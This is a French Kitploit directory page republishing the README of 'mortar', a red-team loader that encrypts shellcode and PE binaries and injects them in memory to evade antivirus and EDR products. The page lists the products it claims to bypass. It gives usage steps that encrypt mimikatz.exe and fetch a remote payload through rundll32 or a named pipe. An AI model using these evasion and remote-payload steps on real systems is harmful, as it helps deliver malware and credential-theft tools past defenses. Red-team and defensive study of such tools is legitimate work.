Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
mortar — technique d'évasion pour contrer et détourner la détection et la prévention des produits de sécurité (AV/EDR/XDR) | Kitploit
Outils/GitHubGitHub/0xsp-srd/mortar
Frameworks d'ExploitationGénération de PayloadsÉvasion IDS/IPSShellcodeRed Teaming
GitHub0xsp-srd/mortar

mortar

technique d'évasion pour contrer et détourner la détection et la prévention des produits de sécurité (AV/EDR/XDR)

Voir le dépôt
1.5k238il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Mortar Loader

Technique d'évasion pour red team afin de vaincre et détourner la détection et la prévention des produits de sécurité. Mortar Loader effectue le chiffrement et le déchiffrement de PE/Shellcode dans les flux mémoire et les exécute en exploitant plusieurs techniques d'injection.
Mortar est capable de contourner les produits antivirus modernes et les solutions XDR avancées, et a été testé et confirmé pour contourner les produits suivants :

  • Kaspersky ✔️
  • ESET AV / EDR ✔️
  • Malewarebytes ✔️
  • Mcafee ✔️
  • Windows defender ✔️
  • Cylance ✔️
  • TrendMicro ✔️
  • Bitdefender ✔️
  • Norton Symantec ✔️
  • Sophos EDR ✔️

Fonctionnalités mises à jour

La nouvelle version (v3) a été publiée avec les fonctionnalités suivantes :

  • Exécution sans fichier avec binaire chiffré ou shellcode mis en scène à distance.
  • Injection Early Bird APC.
  • Masquage de processus.
  • Prise en charge des pipes nommés.
  • Obfuscation des chaînes et des appels de fonctions.
  • Sous-routine de rechargement furtif de Mortar.
  • Techniques d'exécution retardée.

Pour une description technique plus détaillée, référez-vous au billet de blog suivant : https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html

Usage

Encryptor

L'encrypteur chiffre les shellcodes C et les binaires PE et écrit la sortie dans un fichier .enc. Vous êtes autorisé à utiliser n'importe quelle charge utile (MSF/Cobalt/Havoc, etc.) comme vous le souhaitez, à condition qu'elle soit de l'architecture x64 et non RAW.

root@kitploit:~
root@kali>./encryptor -f mimikatz.exe -o bin.enc 
root@kali>./encryptor -f shellcode.c -o bin.enc 

Mortar Loader Library

La nouvelle version exploite plusieurs techniques combinées avec la récupération de charge utile à distance, il est recommandé de se référer au billet de blog suivant pour plus d'informations.

pour des instructions rapides

root@kitploit:~
# PE Forking

1. host your encrypted binary on remote host. 
2. encode the final URL with base64. 
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. covert reload subroutine technique is enabled. 

Prend actuellement en charge l'injection Early Bird en combinaison avec des pipes nommés pour recevoir les variables pour l'exécution finale.

root@kitploit:~
1. inject Mortar DLL into remote process( DLL injection, Hijacking, sideloading).
2. connect into the named pipe to supply your URL 
   echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs 
3. payload will be executed once valid value has been recieved. 

Compilation

Le projet a été codé en utilisant FPC (Free Pascal), les procédures de compilation sont simples en téléchargeant et installant Lazarus IDE (https://www.lazarus-ide.org/index.php?page=downloads).

Pour l'encrypteur, vous pouvez le télécharger depuis la section des versions ou le compiler facilement avec Lazarus IDE.

root@kitploit:~
#Debian & Ubuntu 

apt install fpc 
apt install lazarus-ide 

Publications

  • La version v1 : https://0xsp.com/security%20research%20&%20development%20(SRD)/defeat-the-castle-bypass-av-advanced-xdr-solutions
  • Fonctionnalités de Mortar Loader v2 : https://0xsp.com/offensive/mortar-loader-v2/
  • Présentation CrestCon Asia 2021 : https://www.youtube.com/watch?v=H7EMBz7GLMk

Sponsor ?

Le développement de Mortar ou de tout projet partagé est le résultat de mon temps personnel.

  • Vous montrez une appréciation continue de mon travail.
  • Vous obtiendrez un accès anticipé aux pré-versions.
  • Posez des questions, elles seront répondues.
Télécharger l’outil